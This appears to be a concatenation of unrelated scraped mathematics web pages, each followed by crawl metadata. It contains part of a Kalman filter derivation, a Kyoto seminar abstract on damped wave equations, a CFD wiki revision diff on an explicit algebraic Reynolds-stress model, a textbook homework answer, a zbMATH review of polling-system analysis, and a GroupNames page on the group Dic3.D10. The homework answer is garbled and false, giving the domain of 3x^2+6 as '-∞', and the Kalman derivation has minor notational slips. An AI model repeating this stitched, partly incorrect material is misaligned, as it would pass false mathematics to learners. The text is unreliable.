\Sigma_w$ $\Sigma_{xz} = \Sigma_{xx}H^T$ $\Sigma_{zz} = H\Sigma_{xx}H^T + \Sigma_v$ That’s it! Now plug those values into the Bayes update rule and you have a Kalman Filter! $\mu_{x|z=z_0} = F\mu_{x_0}+ \Sigma_{xz}\Sigma_{zz}^{-1}(z_0 - \mu_z)$ $\Sigma_{x|z=z_0} =\Sigma_{xx} - \Sigma_{xz}\Sigma_{zz}^{-1}\Sigma_{zx}$ A note on terminology for comparison to the Wikipedia article on Kalman Filter: $\mu_x$ is called the predicted mean $\Sigma_{xx}$ is called the predicted covariance $\Sigma_{zz}$ is called the innovation, or pre-fit residual covariance $\Sigma_{xz} \Sigma_{zz}^{-1} = \Sigma_{xx}H^T\Sigma_{zz}^{-1}$ is called the optimal Kalman Gain ## Deriving the Kalman Filter In Detail In this section, I’ll show theses equalities. $\mu_x = F\mu_{x_0}$ $\mu_z = HF\mu_{x_0}$ $\Sigma_{xx} =F\Sigma_{x_0}F^T + \Sigma_w$ $\Sigma_{xz} = \Sigma_{xx}H^T$ $\Sigma_{zz} = H\Sigma_{xx}H^T + \Sigma_v$ Here are the means. $\mu_x = E[x] =E[Fx_0 + w] = FE[x_0] + E[w] = F\mu_{x_0} + 0 = F\mu_{x_0}$ $\mu_z = E[z] = E[Hx + v] = HE[x] + E[v] = H\mu_x + 0 = HF\mu_{x_0}$ Here are the covariances and cross covariance. It will be convenient to define the delta operator $\Delta$ which means $\Delta y = y - E[y]$. Also, for zero-mean variables like $v, \Delta v = v$. $\Sigma_{xx} = E[\Delta x \Delta x^T]$ $= E[ (F \Delta x_0 + w)(F \Delta x_0 + w)^T]$ $= E[ (F \Delta x_0 \Delta x_0^T F^T)] + E[ F\Delta x w^T] + E[ w \Delta x^T F^T] + E[ w w^T]$ Use independence to distribute expectation in the second and third terms. $= F E[\Delta x_0 \Delta x_0^T] F^T + E[ F\Delta x]E[ w^T] + E[ w]E[ \Delta x^T F^T] + E[ w w^T]$ $=F\Sigma_{x_0}F^T + 0 +0 + \Sigma_w$ $=F\Sigma_{x_0}F^T + \Sigma_w$ $\Sigma_{xz} = E[\Delta x \Delta z^T]$ $= E[\Delta x\Delta(Hx + v)^T]$ $= E[\Delta x (H \Delta x + v)^T]$ $= E[\Delta x \Delta x^T]H^T + E[\Delta x ]E[v^T]$ $=\Sigma_{xx} H^T + 0$ $=\Sigma_{xx} H^T$ $\Sigma_{zz} = E[\Delta z\Delta z^T]$ $= E[\Delta (Hx + v)\Delta (Hx + v)^T]$ $= E[(H\Delta x + v)(H\Delta x + v)^T]$ $= HE[\Delta x \Delta x^T]H^T + E[v]E[(H\Delta x+ v)^T] +E[H\Delta x+ v]E[v^T] + E[vv^T]$ $= H\Sigma_{xx} H^T + 0 + 0 + \Sigma_v$ $= H\Sigma_{xx} H^T + \Sigma_v$
2022-05-24 19:46:37
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 119, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9041302800178528, "perplexity": 267.6349334316225}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-21/segments/1652662573189.78/warc/CC-MAIN-20220524173011-20220524203011-00467.warc.gz"}
https://www.math.kyoto-u.ac.jp/ja/event/seminar/4341
# Scattering and asymptotic order for the wave equations with the scale-invariant damping and mass 2020/06/12 Fri 15:30 - 16:30 In this talk, we consider the linear wave equation with the scale-invariant damping and mass. It is known by Wirth that the solution scatters to the solution of the modified wave equation. Our first aim is to investigate the asymptotic order. We also treat the corresponding equation with the energy critical nonlinearity. Our second aim is to obtain the scattering result and its asymptotic order. This talk is based on joint works [1] and [2] with Professor Haruya Mizutani (Osaka University). References: [1] T. Inui, H. Mizutani, "Scattering and asymptotic order for the wave equations with the scale-invariant damping and mass", preprint, arXiv:2004.03832. [2] T. Inui, H. Mizutani, "Remarks on asymptotic order for the linear wave equation with the scale-invariant damping and mass with $L^r$-data", preprint, arXiv:2005.01335. Note: This seminar will be held as a Zoom online seminar.
2020-07-02 22:33:23
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5536035895347595, "perplexity": 1177.245493177969}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-29/segments/1593655880243.25/warc/CC-MAIN-20200702205206-20200702235206-00313.warc.gz"}
https://www.cfd-online.com/W/index.php?title=Explicit_nonlinear_constitutive_relation&diff=cur&oldid=9913
# Explicit nonlinear constitutive relation (Difference between revisions) Revision as of 20:14, 4 November 2009 (view source)← Older edit Latest revision as of 20:15, 4 November 2009 (view source) Line 1: Line 1: {{Template: Turbulence modeling}} {{Template: Turbulence modeling}} + + == General Concept == An explicit nonlinear constitutive relation for the Reynolds stresses represents an explicitly-postulated expansion over the [[Linear eddy viscosity models|linear Boussinesq hypothesis]]. An explicit nonlinear constitutive relation for the Reynolds stresses represents an explicitly-postulated expansion over the [[Linear eddy viscosity models|linear Boussinesq hypothesis]]. Line 28: Line 30: Note that the terms in the first line are exactly the linear relation as expressed by the Boussinesq hypothesis. Note that the terms in the first line are exactly the linear relation as expressed by the Boussinesq hypothesis. - === Reference === + == Reference == * {{reference-paper|author=Wallin, S., and Johansson, A. V.|year=2000|title=An Explicit Algebraic Reynolds Stress Model for Incompressible and Compressible Turbulent Flows|rest=Journal of Fluid Mechanics, Vol. 403, Jan. 2000, pp. 89–132}} * {{reference-paper|author=Wallin, S., and Johansson, A. V.|year=2000|title=An Explicit Algebraic Reynolds Stress Model for Incompressible and Compressible Turbulent Flows|rest=Journal of Fluid Mechanics, Vol. 403, Jan. 2000, pp. 89–132}} {{stub}} {{stub}} ## Latest revision as of 20:15, 4 November 2009 Turbulence RANS-based turbulence models Linear eddy viscosity models Nonlinear eddy viscosity models Explicit nonlinear constitutive relation v2-f models $\overline{\upsilon^2}-f$ model $\zeta-f$ model Reynolds stress model (RSM) Large eddy simulation (LES) Detached eddy simulation (DES) Direct numerical simulation (DNS) Turbulence near-wall modeling Turbulence free-stream boundary conditions ## General Concept An explicit nonlinear constitutive relation for the Reynolds stresses represents an explicitly-postulated expansion over the linear Boussinesq hypothesis. One of such explicit and nonlinear expansion over the Boussinesq hypothesis, as proposed by [Wallin & Johansson (2000)], is given by \begin{align} - \frac{\mathbf{u u}}{k} & + \frac{2}{3} \mathbf{I} = \beta_1 \tilde{\mathbf{S}} \\ & + \beta_2 \left( \tilde{\mathbf{S}}^2 - \frac{II_S}{3} \mathbf{I} \right) + \beta_3 \left( \tilde{\mathbf{\Omega}}^2 - \frac{II_\Omega}{3} \mathbf{I} \right) \\ & + \beta_4 \left( \tilde{\mathbf{S}} \tilde{\mathbf{\Omega}} - \tilde{\mathbf{\Omega}} \tilde{\mathbf{S}} \right) + \beta_5 \left( \tilde{\mathbf{S}}^2 \tilde{\mathbf{\Omega}} - \tilde{\mathbf{\Omega}} \tilde{\mathbf{S}}^2 \right) \\ & + \beta_6 \left( \tilde{\mathbf{S}} \tilde{\mathbf{\Omega}}^2 + \tilde{\mathbf{\Omega}}^2 \tilde{\mathbf{S}} - \frac{2}{3} IV \mathbf{I} \right) \\ & + \beta_7 \left( \tilde{\mathbf{S}}^2 \tilde{\mathbf{\Omega}}^2 + \tilde{\mathbf{\Omega}}^2 \tilde{\mathbf{S}}^2 - \frac{2}{3} V \mathbf{I} \right) \\ & + \beta_8 \left( \tilde{\mathbf{S}} \tilde{\mathbf{\Omega}} \tilde{\mathbf{S}}^2 + \tilde{\mathbf{S}}^2 \tilde{\mathbf{\Omega}} \tilde{\mathbf{S}} \right) + \beta_9 \left( \tilde{\mathbf{\Omega}} \tilde{\mathbf{S}} \tilde{\mathbf{\Omega}}^2 + \tilde{\mathbf{\Omega}}^2 \tilde{\mathbf{S}} \tilde{\mathbf{\Omega}} \right) \\ & + \beta_{10} \left( \tilde{\mathbf{\Omega}} \tilde{\mathbf{S}}^2 \tilde{\mathbf{\Omega}}^2 + \tilde{\mathbf{\Omega}}^2 \tilde{\mathbf{S}}^2 \tilde{\mathbf{\Omega}} \right) \end{align} Note that the terms in the first line are exactly the linear relation as expressed by the Boussinesq hypothesis. ## Reference • Wallin, S., and Johansson, A. V. (2000), "An Explicit Algebraic Reynolds Stress Model for Incompressible and Compressible Turbulent Flows", Journal of Fluid Mechanics, Vol. 403, Jan. 2000, pp. 89–132.
2017-06-29 07:41:19
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 3, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.99994957447052, "perplexity": 7693.851871098466}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-26/segments/1498128323889.3/warc/CC-MAIN-20170629070237-20170629090237-00195.warc.gz"}
https://www.gradesaver.com/textbooks/math/algebra/algebra-1/chapter-9-quadratic-functions-and-equations-9-1-quadratic-graphs-and-their-properties-practice-and-problem-solving-exercises-page-538/29
## Algebra 1 Published by Prentice Hall # Chapter 9 - Quadratic Functions and Equations - 9-1 Quadratic Graphs and Their Properties - Practice and Problem-Solving Exercises - Page 538: 29 #### Answer $-\infty$ #### Work Step by Step The function in the question is: $f(x)=3x^2+6$ First, we find the domain. The domain is $-\infty$ After you claim an answer you’ll have 24 hours to send in a draft. An editor will review the submission and either publish your submission or provide feedback.
2019-09-17 00:24:05
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.46078506112098694, "perplexity": 2065.0461480855924}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-39/segments/1568514572980.56/warc/CC-MAIN-20190917000820-20190917022820-00302.warc.gz"}
https://zbmath.org/?q=an%3A1137.90434
zbMATH — the first resource for mathematics Mean value analysis for polling systems. (English) Zbl 1137.90434 Summary: The present paper deals with the problem of calculating mean delays in polling systems with either exhaustive or gated service. We develop a mean value analysis (MVA) to compute these delay figures. The merits of MVA are in its intrinsic simplicity and its intuitively appealing derivation. As a consequence, MVA may be applied, both in an exact and approximate manner, to a large variety of models. MSC: 90B22 Queues and service in operations research 60K25 Queueing theory (aspects of probability theory) 62H20 Measures of association (correlation, canonical correlation, etc.) Full Text: References: [1] D. Bertsekas, R. Gallager, Data Networks (Prentice-Hall, New Jersey, 1987). [2] O.J. Boxma, Workloads and waiting times in single-server systems with multiple customer classes (Queueing Systems, 5 (1989) 185–214). · Zbl 0681.60098 [3] R.B. Cooper, G. Murray, Queues served in cyclic order (The Bell System Technical Journal, 48 (1969) 675–689). · Zbl 0169.20804 [4] R.B. Cooper, Queues served in cyclic order: waiting times (The Bell System Technical Journal, 49 (1970) 399–413). · Zbl 0208.22502 [5] M. Eisenberg, Queues with periodic service and changeover time (Operations Research, 20 (2)(1972) 440–451). · Zbl 0245.60073 · doi:10.1287/opre.20.2.440 [6] M.J. Ferguson, Y. Aminetzah, Exact results for nonsymmetric token ring systems (IEEE Transactions on Communications, COM-33 (1985) 223–231). [7] P. Franken, D. Koenig, W. Arndt, F. Schmidt, Queues and Point Processes (John Wiley, New York, 1982). · Zbl 0505.60058 [8] S.W. Fuhrmann, Performance analysis of a class of cyclic schedules (Bell Laboratories Technical Memorandum 81-59531-1, 1981). [9] T. Hirayama, S.J. Hong, M. Krunz, A new approach to analysis of polling systems (Queueing Systems, 48 (1-2)(2004) 135–158). · Zbl 1061.60096 · doi:10.1023/B:QUES.0000039891.78286.dd [10] A.G. Konheim, B. Meister, Waiting lines and times in a system with polling (Journal of the Association for Computing Machinery, 21 (3)(1974) 470–490). · Zbl 0298.68047 [11] A.G. Konheim, H. Levy, M.M. Srinivasan, Descendant set: an efficient approach for the analysis of polling systems (IEEE Transactions on Communications, 42 (2/3/4)(1994) 1245–1253). · doi:10.1109/TCOMM.1994.580233 [12] H. Levy, Delay computation and dynamic behavior of non-symmetric polling systems (Performance Evaluation, 10 (1) (1989) 35–51). · doi:10.1016/0166-5316(89)90004-7 [13] H. Levy, M. Sidi, Polling systems: applications, modeling and optimization (IEEE Transactions on Communications, COM-38 (10)(1990) 1750–1760). · doi:10.1109/26.61446 [14] J.D.C. Little, A proof of the queueing formula L = $$\lambda$$ W (Operations Research, 9 (1961) 383–387). · Zbl 0108.14803 [15] C. Mack, T. Murphy, N.L. Webb, The efficiency of N machines uni-directionally patrolled by one operative when walking time and repair times are constants (Journal of the Royal Statistical Society Series B, 19 (1)(1957) 166–172). · Zbl 0090.35301 [16] C. Mack, The efficiency of N machines uni-directionally patrolled by one operative when walking time is constant and repair times are variable (Journal of the Royal Statistical Society Series B, 19 (1)(1957) 173–178). · Zbl 0090.35302 [17] J.A.C. Resing, Polling systems and multitype branching processes (Queueing Systems, 13 (1993) 409–426). · Zbl 0772.60069 · doi:10.1007/BF01149263 [18] I. Rubin, L.F.M. De Moraes, Message delay analysis for polling and token multiple-access schemes for local communication networks (IEEE Journal on Selected Areas in Communications, SAC-l (5)(1983) 935–947). · doi:10.1109/JSAC.1983.1145983 [19] D. Sarkar, W.I. Zangwill, Expected waiting time for nonsymmetric cyclic queueing systems–exact results and applications (Management Science, 35 (1989) 1463–1474). · Zbl 0684.90035 · doi:10.1287/mnsc.35.12.1463 [20] M.M. Srinivasan, H. Levy, A.G. Konheim, The individual station technique for the analysis of polling systems (Naval Research Logistics, 43 (1)(1996) 79–101). · Zbl 0862.60090 · doi:10.1002/(SICI)1520-6750(199602)43:1<79::AID-NAV5>3.0.CO;2-K [21] G.B. Swartz, Polling in a loop system (Journal of the Association for Computing Machinery, 27 (1)(1980) 42–59). · Zbl 0438.94038 [22] H. Takagi, Queueing analysis of polling models: an update (In Stochastic Analysis of Computer and Communication Systems, H. Takagi (ed.), North-Holland, Amsterdam (1990) 267–318). [23] H. Takagi, Queueing analysis of polling models: progress in 1990-1994 (In Frontiers in Queueing: Models, Methods and Problems, J.H. Dshalalow (ed.), CRC Press, Boca Raton (1997) 119–146). · Zbl 0871.60077 [24] H. Takagi, Analysis and application of polling models (In Performance Evaluation: Origins and Directions, G. Haring, C. Lindemann and M. Reiser (eds.), Lecture Notes in Computer Science, vol. 1769, Springer, Berlin (2000) 423–442). [25] R.W. Wolff, Poisson arrivals see time averages (Operations Research, 30 (2) (1982) 223–231). · Zbl 0489.60096 · doi:10.1287/opre.30.2.223 This reference list is based on information provided by the publisher or from digital mathematics libraries. Its items are heuristically matched to zbMATH identifiers and may contain data conversion errors. It attempts to reflect the references listed in the original paper as accurately as possible without claiming the completeness or perfect precision of the matching.
2021-04-12 16:44:58
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.4272236227989197, "perplexity": 11583.990504159243}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-17/segments/1618038067870.12/warc/CC-MAIN-20210412144351-20210412174351-00296.warc.gz"}
https://people.maths.bris.ac.uk/~matyd/GroupNames/217/Dic3.D10.html
Copied to clipboard ## G = Dic3.D10order 240 = 24·3·5 ### 6th non-split extension by Dic3 of D10 acting via D10/D5=C2 Series: Derived Chief Lower central Upper central Derived series C1 — C30 — Dic3.D10 Chief series C1 — C5 — C15 — C30 — C3×Dic5 — S3×Dic5 — Dic3.D10 Lower central C15 — C30 — Dic3.D10 Upper central C1 — C2 — C22 Generators and relations for Dic3.D10 G = < a,b,c,d | a6=c10=1, b2=d2=a3, bab-1=cac-1=dad-1=a-1, cbc-1=dbd-1=a3b, dcd-1=c-1 > Subgroups: 336 in 80 conjugacy classes, 32 normal (all characteristic) C1, C2, C2 [×3], C3, C4 [×4], C22, C22 [×2], C5, S3 [×2], C6, C6, C2×C4 [×3], D4 [×3], Q8, D5, C10, C10 [×2], Dic3, Dic3, C12 [×2], D6, D6, C2×C6, C15, C4○D4, Dic5 [×2], Dic5, C20, D10, C2×C10, C2×C10, Dic6, C4×S3 [×2], D12, C3⋊D4, C3⋊D4, C2×C12, C5×S3, D15, C30, C30, Dic10, C4×D5, C2×Dic5, C2×Dic5, C5⋊D4 [×2], C5×D4, C4○D12, C5×Dic3, C3×Dic5 [×2], Dic15, S3×C10, D30, C2×C30, D42D5, S3×Dic5, D30.C2, C5⋊D12, C15⋊Q8, C6×Dic5, C5×C3⋊D4, C157D4, Dic3.D10 Quotients: C1, C2 [×7], C22 [×7], S3, C23, D5, D6 [×3], C4○D4, D10 [×3], C22×S3, C22×D5, C4○D12, S3×D5, D42D5, C2×S3×D5, Dic3.D10 Smallest permutation representation of Dic3.D10 On 120 points Generators in S120 (1 103 93 50 75 22)(2 23 76 41 94 104)(3 105 95 42 77 24)(4 25 78 43 96 106)(5 107 97 44 79 26)(6 27 80 45 98 108)(7 109 99 46 71 28)(8 29 72 47 100 110)(9 101 91 48 73 30)(10 21 74 49 92 102)(11 31 112 59 65 84)(12 85 66 60 113 32)(13 33 114 51 67 86)(14 87 68 52 115 34)(15 35 116 53 69 88)(16 89 70 54 117 36)(17 37 118 55 61 90)(18 81 62 56 119 38)(19 39 120 57 63 82)(20 83 64 58 111 40) (1 118 50 90)(2 81 41 119)(3 120 42 82)(4 83 43 111)(5 112 44 84)(6 85 45 113)(7 114 46 86)(8 87 47 115)(9 116 48 88)(10 89 49 117)(11 26 59 97)(12 98 60 27)(13 28 51 99)(14 100 52 29)(15 30 53 91)(16 92 54 21)(17 22 55 93)(18 94 56 23)(19 24 57 95)(20 96 58 25)(31 79 65 107)(32 108 66 80)(33 71 67 109)(34 110 68 72)(35 73 69 101)(36 102 70 74)(37 75 61 103)(38 104 62 76)(39 77 63 105)(40 106 64 78) (1 2 3 4 5 6 7 8 9 10)(11 12 13 14 15 16 17 18 19 20)(21 22 23 24 25 26 27 28 29 30)(31 32 33 34 35 36 37 38 39 40)(41 42 43 44 45 46 47 48 49 50)(51 52 53 54 55 56 57 58 59 60)(61 62 63 64 65 66 67 68 69 70)(71 72 73 74 75 76 77 78 79 80)(81 82 83 84 85 86 87 88 89 90)(91 92 93 94 95 96 97 98 99 100)(101 102 103 104 105 106 107 108 109 110)(111 112 113 114 115 116 117 118 119 120) (1 89 50 117)(2 88 41 116)(3 87 42 115)(4 86 43 114)(5 85 44 113)(6 84 45 112)(7 83 46 111)(8 82 47 120)(9 81 48 119)(10 90 49 118)(11 80 59 108)(12 79 60 107)(13 78 51 106)(14 77 52 105)(15 76 53 104)(16 75 54 103)(17 74 55 102)(18 73 56 101)(19 72 57 110)(20 71 58 109)(21 61 92 37)(22 70 93 36)(23 69 94 35)(24 68 95 34)(25 67 96 33)(26 66 97 32)(27 65 98 31)(28 64 99 40)(29 63 100 39)(30 62 91 38) G:=sub<Sym(120)| (1,103,93,50,75,22)(2,23,76,41,94,104)(3,105,95,42,77,24)(4,25,78,43,96,106)(5,107,97,44,79,26)(6,27,80,45,98,108)(7,109,99,46,71,28)(8,29,72,47,100,110)(9,101,91,48,73,30)(10,21,74,49,92,102)(11,31,112,59,65,84)(12,85,66,60,113,32)(13,33,114,51,67,86)(14,87,68,52,115,34)(15,35,116,53,69,88)(16,89,70,54,117,36)(17,37,118,55,61,90)(18,81,62,56,119,38)(19,39,120,57,63,82)(20,83,64,58,111,40), (1,118,50,90)(2,81,41,119)(3,120,42,82)(4,83,43,111)(5,112,44,84)(6,85,45,113)(7,114,46,86)(8,87,47,115)(9,116,48,88)(10,89,49,117)(11,26,59,97)(12,98,60,27)(13,28,51,99)(14,100,52,29)(15,30,53,91)(16,92,54,21)(17,22,55,93)(18,94,56,23)(19,24,57,95)(20,96,58,25)(31,79,65,107)(32,108,66,80)(33,71,67,109)(34,110,68,72)(35,73,69,101)(36,102,70,74)(37,75,61,103)(38,104,62,76)(39,77,63,105)(40,106,64,78), (1,2,3,4,5,6,7,8,9,10)(11,12,13,14,15,16,17,18,19,20)(21,22,23,24,25,26,27,28,29,30)(31,32,33,34,35,36,37,38,39,40)(41,42,43,44,45,46,47,48,49,50)(51,52,53,54,55,56,57,58,59,60)(61,62,63,64,65,66,67,68,69,70)(71,72,73,74,75,76,77,78,79,80)(81,82,83,84,85,86,87,88,89,90)(91,92,93,94,95,96,97,98,99,100)(101,102,103,104,105,106,107,108,109,110)(111,112,113,114,115,116,117,118,119,120), (1,89,50,117)(2,88,41,116)(3,87,42,115)(4,86,43,114)(5,85,44,113)(6,84,45,112)(7,83,46,111)(8,82,47,120)(9,81,48,119)(10,90,49,118)(11,80,59,108)(12,79,60,107)(13,78,51,106)(14,77,52,105)(15,76,53,104)(16,75,54,103)(17,74,55,102)(18,73,56,101)(19,72,57,110)(20,71,58,109)(21,61,92,37)(22,70,93,36)(23,69,94,35)(24,68,95,34)(25,67,96,33)(26,66,97,32)(27,65,98,31)(28,64,99,40)(29,63,100,39)(30,62,91,38)>; G:=Group( (1,103,93,50,75,22)(2,23,76,41,94,104)(3,105,95,42,77,24)(4,25,78,43,96,106)(5,107,97,44,79,26)(6,27,80,45,98,108)(7,109,99,46,71,28)(8,29,72,47,100,110)(9,101,91,48,73,30)(10,21,74,49,92,102)(11,31,112,59,65,84)(12,85,66,60,113,32)(13,33,114,51,67,86)(14,87,68,52,115,34)(15,35,116,53,69,88)(16,89,70,54,117,36)(17,37,118,55,61,90)(18,81,62,56,119,38)(19,39,120,57,63,82)(20,83,64,58,111,40), (1,118,50,90)(2,81,41,119)(3,120,42,82)(4,83,43,111)(5,112,44,84)(6,85,45,113)(7,114,46,86)(8,87,47,115)(9,116,48,88)(10,89,49,117)(11,26,59,97)(12,98,60,27)(13,28,51,99)(14,100,52,29)(15,30,53,91)(16,92,54,21)(17,22,55,93)(18,94,56,23)(19,24,57,95)(20,96,58,25)(31,79,65,107)(32,108,66,80)(33,71,67,109)(34,110,68,72)(35,73,69,101)(36,102,70,74)(37,75,61,103)(38,104,62,76)(39,77,63,105)(40,106,64,78), (1,2,3,4,5,6,7,8,9,10)(11,12,13,14,15,16,17,18,19,20)(21,22,23,24,25,26,27,28,29,30)(31,32,33,34,35,36,37,38,39,40)(41,42,43,44,45,46,47,48,49,50)(51,52,53,54,55,56,57,58,59,60)(61,62,63,64,65,66,67,68,69,70)(71,72,73,74,75,76,77,78,79,80)(81,82,83,84,85,86,87,88,89,90)(91,92,93,94,95,96,97,98,99,100)(101,102,103,104,105,106,107,108,109,110)(111,112,113,114,115,116,117,118,119,120), (1,89,50,117)(2,88,41,116)(3,87,42,115)(4,86,43,114)(5,85,44,113)(6,84,45,112)(7,83,46,111)(8,82,47,120)(9,81,48,119)(10,90,49,118)(11,80,59,108)(12,79,60,107)(13,78,51,106)(14,77,52,105)(15,76,53,104)(16,75,54,103)(17,74,55,102)(18,73,56,101)(19,72,57,110)(20,71,58,109)(21,61,92,37)(22,70,93,36)(23,69,94,35)(24,68,95,34)(25,67,96,33)(26,66,97,32)(27,65,98,31)(28,64,99,40)(29,63,100,39)(30,62,91,38) ); G=PermutationGroup([(1,103,93,50,75,22),(2,23,76,41,94,104),(3,105,95,42,77,24),(4,25,78,43,96,106),(5,107,97,44,79,26),(6,27,80,45,98,108),(7,109,99,46,71,28),(8,29,72,47,100,110),(9,101,91,48,73,30),(10,21,74,49,92,102),(11,31,112,59,65,84),(12,85,66,60,113,32),(13,33,114,51,67,86),(14,87,68,52,115,34),(15,35,116,53,69,88),(16,89,70,54,117,36),(17,37,118,55,61,90),(18,81,62,56,119,38),(19,39,120,57,63,82),(20,83,64,58,111,40)], [(1,118,50,90),(2,81,41,119),(3,120,42,82),(4,83,43,111),(5,112,44,84),(6,85,45,113),(7,114,46,86),(8,87,47,115),(9,116,48,88),(10,89,49,117),(11,26,59,97),(12,98,60,27),(13,28,51,99),(14,100,52,29),(15,30,53,91),(16,92,54,21),(17,22,55,93),(18,94,56,23),(19,24,57,95),(20,96,58,25),(31,79,65,107),(32,108,66,80),(33,71,67,109),(34,110,68,72),(35,73,69,101),(36,102,70,74),(37,75,61,103),(38,104,62,76),(39,77,63,105),(40,106,64,78)], [(1,2,3,4,5,6,7,8,9,10),(11,12,13,14,15,16,17,18,19,20),(21,22,23,24,25,26,27,28,29,30),(31,32,33,34,35,36,37,38,39,40),(41,42,43,44,45,46,47,48,49,50),(51,52,53,54,55,56,57,58,59,60),(61,62,63,64,65,66,67,68,69,70),(71,72,73,74,75,76,77,78,79,80),(81,82,83,84,85,86,87,88,89,90),(91,92,93,94,95,96,97,98,99,100),(101,102,103,104,105,106,107,108,109,110),(111,112,113,114,115,116,117,118,119,120)], [(1,89,50,117),(2,88,41,116),(3,87,42,115),(4,86,43,114),(5,85,44,113),(6,84,45,112),(7,83,46,111),(8,82,47,120),(9,81,48,119),(10,90,49,118),(11,80,59,108),(12,79,60,107),(13,78,51,106),(14,77,52,105),(15,76,53,104),(16,75,54,103),(17,74,55,102),(18,73,56,101),(19,72,57,110),(20,71,58,109),(21,61,92,37),(22,70,93,36),(23,69,94,35),(24,68,95,34),(25,67,96,33),(26,66,97,32),(27,65,98,31),(28,64,99,40),(29,63,100,39),(30,62,91,38)]) 36 conjugacy classes class 1 2A 2B 2C 2D 3 4A 4B 4C 4D 4E 5A 5B 6A 6B 6C 10A 10B 10C 10D 10E 10F 12A 12B 12C 12D 15A 15B 20A 20B 30A ··· 30F order 1 2 2 2 2 3 4 4 4 4 4 5 5 6 6 6 10 10 10 10 10 10 12 12 12 12 15 15 20 20 30 ··· 30 size 1 1 2 6 30 2 5 5 6 10 30 2 2 2 2 2 2 2 4 4 12 12 10 10 10 10 4 4 12 12 4 ··· 4 36 irreducible representations dim 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 4 4 4 4 type + + + + + + + + + + + + + + + + - + image C1 C2 C2 C2 C2 C2 C2 C2 S3 D5 D6 D6 C4○D4 D10 D10 D10 C4○D12 S3×D5 D4⋊2D5 C2×S3×D5 Dic3.D10 kernel Dic3.D10 S3×Dic5 D30.C2 C5⋊D12 C15⋊Q8 C6×Dic5 C5×C3⋊D4 C15⋊7D4 C2×Dic5 C3⋊D4 Dic5 C2×C10 C15 Dic3 D6 C2×C6 C5 C22 C3 C2 C1 # reps 1 1 1 1 1 1 1 1 1 2 2 1 2 2 2 2 4 2 2 2 4 